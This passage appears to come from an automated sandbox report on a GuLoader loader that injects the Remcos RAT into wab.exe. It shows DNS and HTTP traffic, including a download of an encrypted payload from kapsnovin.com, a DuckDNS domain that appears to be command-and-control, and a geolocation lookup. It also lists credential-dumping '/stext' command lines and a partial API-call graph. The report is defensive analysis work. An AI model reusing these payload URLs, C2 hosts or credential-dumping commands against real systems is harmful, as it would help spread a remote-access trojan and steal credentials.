                                                                                                                                                                                                        Oct 23, 2023 20:47:39.335249901 CEST24025003794.156.6.253192.168.11.20

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Oct 23, 2023 20:39:40.455195904 CEST5941853192.168.11.201.1.1.1
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.087702036 CEST53594181.1.1.1192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:44.575050116 CEST6455053192.168.11.201.1.1.1
                                                                                                                                                                                                        Oct 23, 2023 20:39:44.823290110 CEST53645501.1.1.1192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:45.823678017 CEST5880353192.168.11.201.1.1.1
                                                                                                                                                                                                        Oct 23, 2023 20:39:45.990742922 CEST53588031.1.1.1192.168.11.20

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Oct 23, 2023 20:39:40.455195904 CEST192.168.11.201.1.1.10xcddStandard query (0)kapsnovin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:44.575050116 CEST192.168.11.201.1.1.10xa7bcStandard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:45.823678017 CEST192.168.11.201.1.1.10x5559Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.087702036 CEST1.1.1.1192.168.11.200xcddNo error (0)kapsnovin.com77.238.121.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:44.823290110 CEST1.1.1.1192.168.11.200xa7bcName error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:45.990742922 CEST1.1.1.1192.168.11.200x5559No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • kapsnovin.com
                                                                                                                                                                                                        • geoplugin.net

                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        0192.168.11.205003677.238.121.25080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.494599104 CEST0OUTGET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                        Host: kapsnovin.com
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890543938 CEST1INData Raw: 3b 3a c3 fc d9 f9 91 ca 49 88 9b 77 51 e3 d6 34 1c b4 f5 61 96 8b 79 24 6a a6 ac fe 2e f1 66 b9 8b 88 a8 10 f9 9b 61 6e b1 e4 e6 05 c9 be 12 af 9d 9c f7 d9 78 ea e6 1d aa d5 3e 0e ef f4 62 de f7 55 fc e3 d1 88 9c 77 36 cd 01 00 91 9b f3 ef de c1
                                                                                                                                                                                                        Data Ascii: ;:IwQ4ay$j.fanx>bUw6%[`uS_`uEqz3_2cJ#IF_ME zg?%W:M;VKhF\BO^8U|emxX6)K*;Ub/K?FM~\DZ(o&Q8/Dd
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890636921 CEST3INData Raw: 3f 68 83 e2 59 4a 6c 0d ba b2 83 80 47 20 f1 12 28 5e db 85 78 4c a7 c8 1a a9 e4 ce 05 f5 bc 9c 63 17 9b d9 ad f3 a9 de 1e 81 11 0b 51 e2 86 8a f6 06 81 47 4c 03 fd 9c ad 24 be aa c1 f1 31 30 1d a4 f0 87 6c 07 4c a7 0b e0 34 1b 9f 63 81 8b 3e d2
                                                                                                                                                                                                        Data Ascii: ?hYJlG (^xLcQGL$10lL4c>k1YG3m##Ol8!A$qwK)e%WJ;>H)F$d,8YW0Cgo5,U?2KZ=Ra[urd.wR
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890747070 CEST3INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                                        last-modified: Wed, 11 Oct 2023 04:41:30 GMT
                                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                                        content-length: 494656
                                                                                                                                                                                                        date: Mon, 23 Oct 2023 18:39:41 GMT
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890801907 CEST4INData Raw: 32 4d 4b 79 e3 8a e2 1d 53 bc 85 a8 b0 44 62 46 b0 49 f6 6e 90 70 10 a4 95 82 dc d4 0a 0b b0 3e 76 c0 50 bf 8a 0b 38 9f 18 7d b4 d2 97 d9 47 02 2c b9 6a 63 0c c4 62 0c fe 74 c7 90 27 81 b3 74 14 ad 0d 72 c7 ee 36 89 bc 9c 1c a3 01 0d 60 9b 6a d1
                                                                                                                                                                                                        Data Ascii: 2MKySDbFInp>vP8}G,jcbt'tr6`jU 8GXyG=zP)|%otzJkTm!_WR&bLkGLaArH~Oo#,XIOi/>oX7.RVp6sZbA,mG41g"
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890856981 CEST6INData Raw: 3f 5e d9 23 e8 8f 4f 15 6b aa c7 94 3a b5 e3 dc 06 9f 06 2f 99 d0 25 df 84 2e c9 fb 3d 27 89 c8 5c 9d a9 c4 84 43 f8 70 e6 4a 5d b4 15 66 19 47 1e 90 89 d8 72 2c 2c 03 8a b8 c5 df 1a 6e bd 27 9b 3a 02 ca 84 8c 3d c9 5e e5 38 7b 25 72 9a 58 f3 dd
                                                                                                                                                                                                        Data Ascii: ?^#Ok:/%.='\CpJ]fGr,,n':=^8{%rXyrSe'p|u>3Z^DxXnR|8UHl`.g4^=3V_$Kx,>6]ixgIlqoIBhFqdIQ2"H#Iqv@t/s1s.McW
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890919924 CEST7INData Raw: dc ca 62 c3 2d 91 65 f1 b4 6d 50 5e bb bc 9d fd 04 8c 57 de e0 cd 7f 35 2c a5 e5 d8 a3 03 96 9a 83 7a 9a 7c d9 56 cc 88 bd 81 33 d8 38 a7 98 7b 68 58 59 95 e1 80 0c 6d 1a 55 a3 0b 53 4a 17 71 88 38 1d 9f 20 84 e8 b6 f8 8d f0 e4 d2 c3 fd 52 bc 72
                                                                                                                                                                                                        Data Ascii: b-emP^W5,z|V38{hXYmUSJq8 Rr^)P~tqj.LSp@m|?{hcq"^J@2'l,7~Vw4iUG6LA`bHWPVJ4\bG44( NO1t$
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.890973091 CEST8INData Raw: 0a e0 a0 21 ee e0 ed 7f 54 00 3a 48 5d d7 04 ea e6 b8 03 5e c5 5d 9b 30 ee 36 89 33 a9 10 30 bb f2 ed df f6 c1 90 d4 e6 51 47 75 c8 d8 ce cf 47 ce a7 7c 74 9f f4 03 99 29 44 5b 00 b0 f6 96 a8 8e 06 ac a8 1e 8e 14 bb f3 43 7c a3 7f 21 5b 2d 39 8b
                                                                                                                                                                                                        Data Ascii: !T:H]^]0630QGuG|t)D[C|![-9P^%^+MM,eKH,v_Rzpj'@G>VK'-Vzz(&9Z1,Ee<<_]|sLIK-5^nsCglb+78x/kG!Q[J:
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891028881 CEST10INData Raw: 03 19 2d 77 b1 1a 9e 72 c4 2d 63 02 54 cd 4f 28 a3 fa 37 10 2b ea 3e f0 d6 3f 1a 4a a1 d0 47 8a 47 99 d3 61 f6 8d 7b 47 bd 6d 9f c1 65 fe d0 b6 f8 89 11 4e d2 1e 03 09 c6 63 d3 5d ec c1 f1 58 25 e5 bf d6 9c 82 6f 44 b2 54 fe 12 2d 58 46 91 1d 4a
                                                                                                                                                                                                        Data Ascii: -wr-cTO(7+>?JGGa{GmeNc]X%oDT-XFJ3?P|&f{^dc}B,n?GMyPhfYrf-xFqY#X s8*Zfc>1p4i,ZK5K"YW*MY5LU
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891089916 CEST11INData Raw: af ae 1a 0b 99 d2 d1 4e c0 a8 5d 44 e2 a4 38 c5 76 33 bd 50 21 ef 77 7c b6 42 c2 4d 5e 72 80 f6 ba 73 17 11 7e c2 1e 03 0e 5d e3 13 7c 40 7b 2a 4a a6 13 7c 0d 85 b6 83 d1 b1 df 0e 12 28 51 c3 19 58 5d 2d 3b 79 db 3d 11 71 13 cd 53 89 58 3a e0 10
                                                                                                                                                                                                        Data Ascii: N]D8v3P!w|BM^rs~]|@{*J|(QX]-;y=qSX:"|@6b_A4M?vTC/fz6h67amWQ[{+#lHI syY^OnRDfshP?k6!jL*@}l";'bo<
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.891150951 CEST13INData Raw: c4 61 d9 67 a7 55 95 51 91 0b 45 c2 eb 85 d1 d0 ca 3d d0 52 3c 51 05 25 c0 27 9c b0 f8 0b 4e 4c 08 38 a6 a0 9c bf 8c 1e 94 47 75 f4 e5 12 2b fe cc 3c c0 ae 40 66 c1 2d c6 02 71 c7 b6 1c 4b 5a e7 c6 ce dd dd f1 ca 0d a1 07 00 39 61 48 fe 06 fc fc
                                                                                                                                                                                                        Data Ascii: agUQE=R<Q%'NL8Gu+<@f-qKZ9aH3toi'vL']^ dh1:||J:EqU#_A%=B#Y 9(r4X1|1,NY>;9;o@YK:O
                                                                                                                                                                                                        Oct 23, 2023 20:39:42.284961939 CEST14INData Raw: d5 0f 2a fc 6e 8e 29 96 67 79 87 29 11 71 68 dd d0 9a f0 93 8b e2 ff a9 c0 60 ba 6e 31 a1 9b 67 d5 7d c0 f4 58 aa 07 d6 d4 ea 88 e5 65 05 e5 8e 90 4c ec 6b e4 72 69 ce 54 81 d9 09 8e d9 b8 5c 67 99 b1 8d 6a bd c7 eb 80 ca 20 16 1d 60 2b 6b 8e 1a
                                                                                                                                                                                                        Data Ascii: *n)gy)qh`n1g}XeLkriT\gj `+kZe#)!+Y@^4h_$\z"K:xKCwSe6+mp(|WF8exuNczk&uwj>aL\P>m!e


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        1192.168.11.2050039178.237.33.5080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Oct 23, 2023 20:39:46.307024956 CEST526OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Oct 23, 2023 20:39:46.627927065 CEST533INHTTP/1.1 200 OK
                                                                                                                                                                                                        date: Mon, 23 Oct 2023 18:39:46 GMT
                                                                                                                                                                                                        server: Apache
                                                                                                                                                                                                        content-length: 973
                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 43 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 30 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 35 34 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 38 2e 32 34 34 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"102.129.145.32", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Los Angeles", "geoplugin_region":"California", "geoplugin_regionCode":"CA", "geoplugin_regionName":"California", "geoplugin_areaCode":"", "geoplugin_dmaCode":"803", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0544", "geoplugin_longitude":"-118.2441", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:20:39:21
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:2'729'832 bytes
                                                                                                                                                                                                        MD5 hash:B434372E36A7D17BC61C8062BBC14015
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.12043367453.0000000000627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.12044516719.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:20:39:29
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        Imagebase:0xc70000
                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                        Start time:20:39:48
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw
                                                                                                                                                                                                        Imagebase:0xc70000
                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:20:39:48
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj
                                                                                                                                                                                                        Imagebase:0xc70000
                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:20:39:48
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
                                                                                                                                                                                                        Imagebase:0xc70000
                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:21.1%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:13.8%
                                                                                                                                                                                                          Signature Coverage:20.8%
                                                                                                                                                                                                          Total number of Nodes:1525
                                                                                                                                                                                                          Total number of Limit Nodes:47
                                                                                                                                                                                                          execution_graph 4742 10001000 4745 1000101b 4742->4745 4746 10001516 GlobalFree 4745->4746 4747 10001020 4746->4747 4748 10001024 4747->4748 4749 10001027 GlobalAlloc 4747->4749 4750 1000153d 3 API calls 4748->4750 4749->4748 4751 10001019 4750->4751 4752 402840 4753 402bbf 18 API calls 4752->4753 4755 40284e 4753->4755 4754 402864 4757 405c00 2 API calls 4754->4757 4755->4754 4756 402bbf 18 API calls 4755->4756 4756->4754 4758 40286a 4757->4758 4780 405c25 GetFileAttributesW CreateFileW 4758->4780 4760 402877 4761 402883 GlobalAlloc 4760->4761 4762 40291a 4760->4762 4765 402911 CloseHandle 4761->4765 4766 40289c 4761->4766 4763 402922 DeleteFileW 4762->4763 4764 402935 4762->4764 4763->4764 4765->4762 4781 403258 SetFilePointer 4766->4781 4768 4028a2 4769 403242 ReadFile 4768->4769 4770 4028ab GlobalAlloc 4769->4770 4771 4028bb 4770->4771 4772 4028ef 4770->4772 4773 403027 32 API calls 4771->4773 4774 405cd7 WriteFile 4772->4774 4779 4028c8 4773->4779 4775 4028fb GlobalFree 4774->4775 4776 403027 32 API calls 4775->4776 4777 40290e 4776->4777 4777->4765 4778 4028e6 GlobalFree 4778->4772 4779->4778 4780->4760 4781->4768 4782 401cc0 4783 402ba2 18 API calls 4782->4783 4784 401cc7 4783->4784 4785 402ba2 18 API calls 4784->4785 4786 401ccf GetDlgItem 4785->4786 4787 402531 4786->4787 4788 4029c0 4789 402ba2 18 API calls 4788->4789 4790 4029c6 4789->4790 4791 4029f9 4790->4791 4793 40281e 4790->4793 4794 4029d4 4790->4794 4792 406072 18 API calls 4791->4792 4791->4793 4792->4793 4794->4793 4796 405f97 wsprintfW 4794->4796 4796->4793 4161 401fc3 4162 401fd5 4161->4162 4163 402087 4161->4163 4184 402bbf 4162->4184 4165 401423 25 API calls 4163->4165 4172 4021e1 4165->4172 4167 402bbf 18 API calls 4168 401fe5 4167->4168 4169 401ffb LoadLibraryExW 4168->4169 4170 401fed GetModuleHandleW 4168->4170 4169->4163 4171 40200c 4169->4171 4170->4169 4170->4171 4190 406499 WideCharToMultiByte 4171->4190 4175 402056 4177 4051af 25 API calls 4175->4177 4176 40201d 4178 402025 4176->4178 4179 40203c 4176->4179 4180 40202d 4177->4180 4234 401423 4178->4234 4193 10001759 CloseHandle 4179->4193 4180->4172 4182 402079 FreeLibrary 4180->4182 4182->4172 4185 402bcb 4184->4185 4186 406072 18 API calls 4185->4186 4187 402bec 4186->4187 4188 401fdc 4187->4188 4189 4062e4 5 API calls 4187->4189 4188->4167 4189->4188 4191 4064c3 GetProcAddress 4190->4191 4192 402017 4190->4192 4191->4192 4192->4175 4192->4176 4237 10001b18 4193->4237 4195 10001790 4196 100018a6 4195->4196 4197 100017a1 4195->4197 4198 100017a8 4195->4198 4196->4180 4286 10002286 4197->4286 4269 100022d0 4198->4269 4203 1000180c 4207 10001812 4203->4207 4208 1000184e 4203->4208 4204 100017ee 4299 100024a9 4204->4299 4205 100017d7 4217 100017cd 4205->4217 4296 10002b5f 4205->4296 4206 100017be 4210 100017c4 4206->4210 4216 100017cf 4206->4216 4212 100015b4 3 API calls 4207->4212 4214 100024a9 10 API calls 4208->4214 4210->4217 4280 100028a4 4210->4280 4219 10001828 4212->4219 4220 10001840 4214->4220 4215 100017f4 4310 100015b4 4215->4310 4290 10002645 4216->4290 4217->4203 4217->4204 4224 100024a9 10 API calls 4219->4224 4226 10001895 4220->4226 4321 1000246c 4220->4321 4223 100017d5 4223->4217 4224->4220 4226->4196 4228 1000189f GlobalFree 4226->4228 4228->4196 4231 10001881 4231->4226 4325 1000153d wsprintfW 4231->4325 4232 1000187a FreeLibrary 4232->4231 4235 4051af 25 API calls 4234->4235 4236 401431 4235->4236 4236->4180 4328 1000121b GlobalAlloc 4237->4328 4239 10001b3c 4329 1000121b GlobalAlloc 4239->4329 4241 10001d7a GlobalFree GlobalFree GlobalFree 4242 10001d97 4241->4242 4253 10001de1 4241->4253 4244 100020ee 4242->4244 4242->4253 4255 10001dac 4242->4255 4243 10001b47 4243->4241 4245 10001c1d GlobalAlloc 4243->4245 4247 10002048 4243->4247 4248 10001c86 GlobalFree 4243->4248 4251 10001c68 lstrcpyW 4243->4251 4252 10001c72 lstrcpyW 4243->4252 4243->4253 4264 10001cc4 4243->4264 4265 10001f37 GlobalFree 4243->4265 4267 1000122c 2 API calls 4243->4267 4335 1000121b GlobalAlloc 4243->4335 4246 10002110 GetModuleHandleW 4244->4246 4244->4253 4245->4243 4249 10002121 LoadLibraryW 4246->4249 4250 10002136 4246->4250 4247->4253 4263 10002090 lstrcpyW 4247->4263 4248->4243 4249->4250 4249->4253 4336 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4250->4336 4251->4252 4252->4243 4253->4195 4255->4253 4332 1000122c 4255->4332 4256 10002148 4257 10002188 4256->4257 4268 10002172 GetProcAddress 4256->4268 4257->4253 4258 10002195 lstrlenW 4257->4258 4337 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4258->4337 4262 100021af 4262->4253 4263->4253 4264->4243 4330 1000158f GlobalSize GlobalAlloc 4264->4330 4265->4243 4267->4243 4268->4257 4276 100022e8 4269->4276 4271 10002415 GlobalFree 4275 100017ae 4271->4275 4271->4276 4272 100023d3 lstrlenW 4272->4271 4279 100023de 4272->4279 4273 100023ba GlobalAlloc CLSIDFromString 4273->4271 4274 1000238f GlobalAlloc WideCharToMultiByte 4274->4271 4275->4205 4275->4206 4275->4217 4276->4271 4276->4272 4276->4273 4276->4274 4277 1000122c GlobalAlloc lstrcpynW 4276->4277 4339 100012ba 4276->4339 4277->4276 4279->4271 4343 100025d9 4279->4343 4281 100028b6 4280->4281 4282 1000295b CreateFileA 4281->4282 4283 10002979 4282->4283 4284 10002a75 4283->4284 4285 10002a6a GetLastError 4283->4285 4284->4217 4285->4284 4287 10002296 4286->4287 4288 100017a7 4286->4288 4287->4288 4289 100022a8 GlobalAlloc 4287->4289 4288->4198 4289->4287 4294 10002661 4290->4294 4291 100026b2 GlobalAlloc 4295 100026d4 4291->4295 4292 100026c5 4293 100026ca GlobalSize 4292->4293 4292->4295 4293->4295 4294->4291 4294->4292 4295->4223 4297 10002b6a 4296->4297 4298 10002baa GlobalFree 4297->4298 4346 1000121b GlobalAlloc 4299->4346 4301 10002530 StringFromGUID2 4307 100024b3 4301->4307 4302 10002541 lstrcpynW 4302->4307 4303 1000250b MultiByteToWideChar 4303->4307 4304 10002554 wsprintfW 4304->4307 4305 10002571 GlobalFree 4305->4307 4306 100025ac GlobalFree 4306->4215 4307->4301 4307->4302 4307->4303 4307->4304 4307->4305 4307->4306 4308 10001272 2 API calls 4307->4308 4347 100012e1 4307->4347 4308->4307 4351 1000121b GlobalAlloc 4310->4351 4312 100015ba 4313 100015c7 lstrcpyW 4312->4313 4315 